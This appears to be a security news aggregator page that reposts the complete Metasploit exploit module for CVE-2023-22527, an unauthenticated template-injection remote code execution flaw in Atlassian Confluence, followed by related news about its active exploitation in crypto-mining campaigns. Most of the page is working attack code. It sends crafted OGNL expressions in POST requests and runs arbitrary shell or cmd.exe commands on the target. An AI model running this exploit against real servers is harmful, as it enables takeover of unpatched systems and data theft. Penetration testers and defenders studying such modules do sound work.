Security
Headlines
HeadlinesLatestCVEs

Headline

Atlassian Confluence SSTI Injection

This Metasploit module exploits an SSTI injection in Atlassian Confluence servers. A specially crafted HTTP request uses the injection to evaluate an OGNL expression resulting in OS command execution. Versions 8.5.0 through 8.5.3 and 8.0 to 8.4 are known to be vulnerable.

Packet Storm
#vulnerability#windows#linux#apache#git#java#auth
### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  prepend Msf::Exploit::Remote::AutoCheck  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::Remote::HTTP::Atlassian::Confluence::Version  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Atlassian Confluence SSTI Injection',        'Description' => %q{          This module exploits an SSTI injection in Atlassian Confluence servers. A specially crafted HTTP request uses          the injection to evaluate an OGNL expression resulting in OS command execution.          Versions 8.5.0 through 8.5.3 and 8.0 to 8.4 are known to be vulnerable.        },        'Author' => [          'Rahul Maini', # ProjectDiscovery analysis          'Harsh Jaiswal', # ProjectDiscovery analysis          'Spencer McIntyre'        ],        'References' => [          ['CVE', '2023-22527'],          ['URL', 'https://confluence.atlassian.com/security/cve-2023-22527-rce-remote-code-execution-vulnerability-in-confluence-data-center-and-confluence-server-1333990257.html'],          ['URL', 'https://blog.projectdiscovery.io/atlassian-confluence-ssti-remote-code-execution/']        ],        'DisclosureDate' => '2024-01-16', # Atlassian advisory released        'License' => MSF_LICENSE,        'Platform' => ['unix', 'linux', 'win'],        'Arch' => [ARCH_CMD],        'Privileged' => false,        'Targets' => [          [            'Unix Command',            {              'Platform' => ['unix', 'linux'],              'Arch' => ARCH_CMD            }          ],          [            'Windows Command',            {              'Platform' => 'win',              'Arch' => ARCH_CMD,              'Payload' => { 'Space' => 8191, 'DisableNops' => true }            }          ]        ],        'DefaultTarget' => 0,        'DefaultOptions' => {          'RPORT' => 8090        },        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS]        }      )    )    register_options([      OptString.new('TARGETURI', [true, 'Base path', '/'])    ])  end  def get_confluence_platform    # this method gets the platform by exploiting CVE-2023-22527    return @confluence_platform if @confluence_platform    header = "X-#{Rex::Text.rand_text_alphanumeric(10..15)}"    ognl = <<~OGNL.gsub(/^\s+/, '').tr("\n", '')      @org.apache.struts2.ServletActionContext@getResponse().setHeader(        '#{header}',        (@java.lang.System@getProperty('os.name'))      )    OGNL    res = inject_ognl(ognl)    return nil unless res    res.headers[header]  end  def check    confluence_version = get_confluence_version    return CheckCode::Unknown('Failed to determine the Confluence version.') unless confluence_version    vprint_status("Detected Confluence version: #{confluence_version}")    if confluence_version > Rex::Version.new('8.5.3')      return CheckCode::Safe("Version #{confluence_version} is not affected.")    end    confluence_platform = get_confluence_platform    unless confluence_platform      return CheckCode::Safe('Failed to test OGNL injection.')    end    vprint_status("Detected target platform: #{confluence_platform}")    CheckCode::Vulnerable('Successfully tested OGNL injection.')  end  def exploit    confluence_platform = get_confluence_platform    unless confluence_platform      fail_with(Failure::NotVulnerable, 'The target is not vulnerable.')    end    unless confluence_platform.downcase.start_with?('win') == (target['Platform'] == 'win')      fail_with(Failure::NoTarget, "The target platform '#{confluence_platform}' is incompatible with '#{target.name}'")    end    print_status("Executing #{payload_instance.refname} (#{target.name})")    execute_command(payload.encoded)  end  def execute_command(cmd, _opts = {})    param = rand_text_alphanumeric(6..10)    # reference a parameter in the OGNL to work around the 200 character length limit    ognl = <<~OGNL.gsub(/^\s+/, '').tr("\n", '')      (new freemarker.template.utility.Execute()).exec(        {@org.apache.struts2.ServletActionContext@getRequest().getParameter('#{param}')}      )    OGNL    if target['Platform'] == 'win'      vars_post = { param => "cmd.exe /c \"#{cmd}\"" }    else      # the command is executed via Runtime.exec, so sh -c "#{cmd}" will not work with all payloads      # see: https://codewhitesec.blogspot.com/2015/03/sh-or-getting-shell-environment-from.html?m=1      vars_post = { param => "sh -c $@|sh . echo #{cmd}" }    end    inject_ognl(ognl, 'vars_post' => vars_post)  end  def inject_ognl(ognl, opts = {})    opts = opts.clone    param = rand_text_alphanumeric(6..10)    final_opts = {      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'template/aui/text-inline.vm'),      'vars_post' => {        # label and param are both limited to a 200 character length by default        'label' => "\\u0027+#request.get(\\u0027.KEY_velocity.struts2.context\\u0027).internalGet(\\u0027ognl\\u0027).findValue(#parameters.#{param},{})+\\u0027",        param => ognl      }.merge(opts.delete('vars_post') || {})    }.merge(opts)    send_request_cgi(final_opts)  endend

Related news

Progress WhatsUp Gold Exploited Just Hours After PoC Release for Critical Flaw

Malicious actors are likely leveraging publicly available proof-of-concept (PoC) exploits for recently disclosed security flaws in Progress Software WhatsUp Gold to conduct opportunistic attacks. The activity is said to have commenced on August 30, 2024, a mere five hours after a PoC was released for CVE-2024-6670 (CVSS score: 9.8) by security researcher Sina Kheirkhah of the Summoning Team, who

Atlassian Confluence Vulnerability Exploited in Crypto Mining Campaigns

Threat actors are actively exploiting a now-patched, critical security flaw impacting the Atlassian Confluence Data Center and Confluence Server to conduct illicit cryptocurrency mining on susceptible instances. "The attacks involve threat actors that employ methods such as the deployment of shell scripts and XMRig miners, targeting of SSH endpoints, killing competing crypto mining processes,

Atlassian Confluence 8.5.3 Remote Code Execution

Atlassian Confluence versions 8.0.x, 8.1.x, 8.2.x, 8.3.x, 8.4.x, and 8.5.0 through 8.5.3 suffer from a remote code execution vulnerability.

November 2023 – January 2024: New Vulristics Features, 3 Months of Microsoft Patch Tuesdays and Linux Patch Wednesdays, Year 2023 in Review

Hello everyone! It has been 3 months since the last episode. I spent most of this time improving my Vulristics project. So in this episode, let’s take a look at what’s been done. Alternative video link (for Russia): https://vk.com/video-149273431_456239139 Also, let’s take a look at the Microsoft Patch Tuesdays vulnerabilities, Linux Patch Wednesdays vulnerabilities and […]

~40,000 Attacks in 3 Days: Critical Confluence RCE Under Active Exploitation

Malicious actors have begun to actively exploit a recently disclosed critical security flaw impacting Atlassian Confluence Data Center and Confluence Server, within three days of public disclosure. Tracked as CVE-2023-22527 (CVSS score: 10.0), the vulnerability impacts out-of-date versions of the software, allowing unauthenticated attackers to achieve remote code execution on susceptible

Citrix, VMware, and Atlassian Hit with Critical Flaws — Patch ASAP!

Citrix is warning of two zero-day security vulnerabilities in NetScaler ADC (formerly Citrix ADC) and NetScaler Gateway (formerly Citrix Gateway) that are being actively exploited in the wild. The flaws are listed below - CVE-2023-6548 (CVSS score: 5.5) - Authenticated (low privileged) remote code execution on Management Interface (requires access to NSIP, CLIP, or SNIP with management

Packet Storm: Latest News

Acronis Cyber Protect/Backup Remote Code Execution